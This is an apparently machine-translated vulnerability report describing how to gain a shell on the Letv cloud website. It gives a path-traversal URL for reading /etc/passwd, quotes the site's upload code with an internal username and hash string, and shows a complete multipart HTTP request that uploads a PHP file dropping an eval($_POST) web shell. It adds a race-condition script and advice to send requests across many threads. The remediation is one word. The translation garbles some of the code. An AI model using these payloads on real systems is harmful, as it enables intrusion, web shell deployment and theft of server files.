Letv cloud main site getshell

Letv cloud main site getshell

The Leeco cloud main site can use getshell because of the design permission on the code.

Http://www.letvcloud.com/api/docdownload? Filename = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd can be downloaded from any file
 

Read this file www/Home/Lib/Action/VideoAction. class. php

Starting from line 1
 

} Else {// only supports jpeg upload $ max_file_size = 2000000; // The maximum size of the uploaded file is 2 MB. The unit is BYTEif ($ file ['type']! = 'Image/jpeg '& $ file ['type']! = 'Image/pjpeg ') {$ error_message = "<font color = 'red'> images can only be in jpg format! </Font> "; echo '<script> (function({{parent.doc ument. getElementById ("'. $ txtid. '"). innerHTML = "'. $ error_message. '";}) (); </script>'; exit;} if ($ max_file_size <$ file [" size "]) {$ error_message = "<font color = 'red'> the maximum file size should not exceed 2 MB! </Font> "; echo '<script> (function({{parent.doc ument. getElementById ("'. $ txtid. '"). innerHTML = "'. $ error_message. '";}) (); </script>'; exit ;}}$ dest_folder =" Public/img/"; if (! File_exists ($ dest_folder) {mkdir ($ dest_folder);} $ pinfo = pathinfo ($ file ['name']); $ newfilename = md5 (time ()). ". ". $ pinfo ['extension']; $ destination = $ dest_folder. $ newfilename; if (move_uploaded_file ($ filename, $ destination) {$ url =' http://upload.letvcdn.com:8000/single_upload_tool.php '; $ Data = array ("isphone" => "1", "username" => "isleju", "md5str" => "26f6c33c801913158424f7d3fbd6d0c3 ", "single_upload_submit" => "", "single_upload_file" => "@". realpath ($ destination), // change the file name to "single_upload_submit" => "OK"); $ urldatajson = uploadByCURL ($ data, $ url ); $ urldata = json_decode ($ urldatajson, true); unlink ($ destination );

Unlink the uploaded file. However, if you upload the file to another server in the middle, the time difference will be left.

Using this time difference, we can getshell

First package
 

POST /video/imgupload HTTP/1.1Host: www.letvcloud.comProxy-Connection: keep-aliveContent-Length: 450Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.letvcloud.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGFLdcAPyYpQq380JReferer: http://www.letvcloud.com/video/edit/videoid/8682339Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4Cookie: LETVCLOUDID=705140aba5a3dc13e1222394352ade2b; Hm_lvt_984e73b4d6ff5ece34ec3da984ece290=1418609297; Hm_lpvt_984e73b4d6ff5ece34ec3da984ece290=1418631122------WebKitFormBoundaryGFLdcAPyYpQq380JContent-Disposition: form-data; name="txtid"load_message------WebKitFormBoundaryGFLdcAPyYpQq380JContent-Disposition: form-data; name="headImg"headImg------WebKitFormBoundaryGFLdcAPyYpQq380JContent-Disposition: form-data; name="upfile"; filename="test§1§.php"Content-Type: image/jpeg<?php fputs(fopen('f.php','w'),'<?php eval($_POST[f])?>');?>------WebKitFormBoundaryGFLdcAPyYpQq380J--

If you open 20 threads and keep sending packets, PHP files are continuously generated and uploaded to other servers.

Use the following script
 

<?php$url="http://www.letvcloud.com/Public/img/".md5(time()).".php";echo $url;file_get_contents($url);php?>

Open a higher thread to send packets



Before the file is deleted, php accessing the uploaded file will write a new php file, resulting in getshell
 

 

Solution:

Filter